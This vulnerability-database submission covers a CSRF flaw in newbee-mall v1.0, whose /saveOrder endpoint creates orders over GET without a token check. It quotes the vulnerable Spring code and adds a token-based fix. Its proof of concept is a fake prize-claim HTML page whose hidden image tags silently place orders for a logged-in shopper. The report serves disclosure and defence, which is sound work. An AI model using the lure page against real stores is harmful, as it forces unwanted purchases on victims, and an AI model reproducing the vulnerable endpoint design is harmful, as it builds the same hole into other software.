| Title | newbee-ltd newbee-mall v1.0 CSRF |
|---|---|

**Description**

# CSRF Vulnerability in Order Creation (Critical Design Flaw)
## Summary
A **critical CSRF vulnerability** exists in the order creation endpoint `/saveOrder`. This endpoint uses a **GET request** to create orders, making it trivially exploitable via simple HTML image tags. Combined with the lack of CSRF protection, attackers can force authenticated users to place orders without their knowledge.
## Vulnerability Details
### Configuration-Level Issue
**File**: `src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java`
```java
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    // Login interceptor bean (its declaration is not shown in the original excerpt)
    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor;

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/saveOrder");
        // ❌ Only session authentication, no CSRF protection
    }
}
```
### Endpoint-Level Code Analysis
**File**: `src/main/java/ltd/newbee/mall/controller/mall/OrderController.java` (Lines 67-83)
```java
@GetMapping("/saveOrder") // ❌ CRITICAL: GET method for state-changing operation!
public String saveOrder(HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    List<NewBeeMallShoppingCartItemVO> myShoppingCartItems =
            newBeeMallShoppingCartService.getMyShoppingCartItems(user.getUserId());
    if (!StringUtils.hasText(user.getAddress().trim())) {
        NewBeeMallException.fail(ServiceResultEnum.NULL_ADDRESS_ERROR.getResult());
    }
    if (CollectionUtils.isEmpty(myShoppingCartItems)) {
        NewBeeMallException.fail(ServiceResultEnum.SHOPPING_ITEM_ERROR.getResult());
    }
    // ❌ No CSRF token validation
    // ⚠️ Creates order based solely on session cookie
    String saveOrderResult = newBeeMallOrderService.saveOrder(user, myShoppingCartItems);
    return "redirect:/orders/" + saveOrderResult;
}
```
**Critical Design Flaws**:
1. ❌ Uses the GET method for order creation (GET is defined as a safe, idempotent method and must not change server state)
2. ❌ No CSRF token validation
3. ❌ No additional authorization beyond session cookie
4. ⚠️ Can be triggered by simple `<img>` tag
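The fix the report implies has two halves: move the endpoint to POST so an `<img>` tag can no longer reach it, and bind every state-changing request to a synchronizer token held in the session. The interceptor below is an added illustration written for this page, not code from the newbee-mall project; it assumes a Spring Boot 2.x / `javax.servlet` stack, a hypothetical `_csrf` form parameter name, and that `@GetMapping("/saveOrder")` is changed to `@PostMapping("/saveOrder")` at the same time, since the interceptor deliberately lets GET through.

```java
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.nio.charset.StandardCharsets;
import java.util.Base64;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;
import org.springframework.web.servlet.HandlerInterceptor;

/** Synchronizer-token check for non-safe requests (hypothetical class, not part of newbee-mall).
 *  Register it next to the login interceptor:
 *    registry.addInterceptor(new CsrfTokenInterceptor()).addPathPatterns("/saveOrder");
 *  and change the controller to @PostMapping("/saveOrder"), otherwise GET still bypasses it. */
public class CsrfTokenInterceptor implements HandlerInterceptor {
    public static final String TOKEN_KEY = "CSRF_TOKEN";   // session attribute name (assumed)
    public static final String PARAM_NAME = "_csrf";       // hidden form field name (assumed)
    private static final SecureRandom RNG = new SecureRandom();

    /** Returns the session's token, minting one on first use; render it into the order form. */
    public static String tokenFor(HttpSession session) {
        synchronized (session) {
            String t = (String) session.getAttribute(TOKEN_KEY);
            if (t == null) {
                byte[] raw = new byte[32];
                RNG.nextBytes(raw);
                t = Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
                session.setAttribute(TOKEN_KEY, t);
            }
            return t;
        }
    }

    /** Constant-time comparison; a missing token on either side is a failure, never a pass. */
    public static boolean tokenMatches(String expected, String supplied) {
        if (expected == null || supplied == null) return false;
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     supplied.getBytes(StandardCharsets.UTF_8));
    }

    @Override
    public boolean preHandle(HttpServletRequest req, HttpServletResponse res, Object handler) throws Exception {
        String m = req.getMethod();
        if ("GET".equals(m) || "HEAD".equals(m) || "OPTIONS".equals(m)) return true; // safe methods
        HttpSession session = req.getSession(false);
        String expected = session == null ? null : (String) session.getAttribute(TOKEN_KEY);
        if (!tokenMatches(expected, req.getParameter(PARAM_NAME))) {
            res.sendError(HttpServletResponse.SC_FORBIDDEN, "missing or invalid CSRF token");
            return false;
        }
        return true;
    }
}
```

A cross-site page cannot read the victim's session token, so a forged POST (from a form or `fetch`) fails the check; the same-site cookie attribute on the session cookie is a worthwhile second layer but not a replacement for the token.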
## Proof of Concept (PoC)
```html
<!DOCTYPE html>
<html>
<head>
    <title>Congratulations! You've Won!</title>
</head>
<body>
    <h1>Claim Your Free iPhone 15 Pro Max!</h1>
    <p>Click the button below to verify your identity and claim your prize!</p>
    <button style="padding: 20px; font-size: 18px; background: #4CAF50; color: white; border: none; cursor: pointer;">
        Claim Prize Now!
    </button>
    <!-- CSRF Attack: Invisible image that triggers order creation -->
    <img src="http://localhost:28089/saveOrder" style="display:none;"
         onerror="document.body.innerHTML='<h2>Processing... Please wait.</h2>'">
    <!-- Alternative: Multiple orders can be placed -->
    <img src="http://localhost:28089/saveOrder" style="display:none;">
    <img src="http://localhost:28089/saveOrder" style="display:none;">
</body>
</html>
```
## Impact
**Unauthorized order placement leading to financial loss** - Attackers can force users to purchase items in their shopping cart, resulting in unwanted charges and potential financial fraud.
---
**CVSS Score**: 8.1 (High)

| Field | Value |
|---|---|
| Source | https://github.com/newbee-ltd/newbee-mall/issues/107 |
| User | flashzyc (UID 92850) |
| Submitted | 2026-02-05 11:49 (4 months ago) |
| Moderation | 2026-02-18 07:55 (13 days later) |
| Status | Duplicate |
| VulDB Entry | 346456 [newbee-ltd newbee-mall up to a069069b07027613bf0e7f571736be86f431faee Multiple Endpoints Cross-Site Request Forgery] |
| Points | 0 |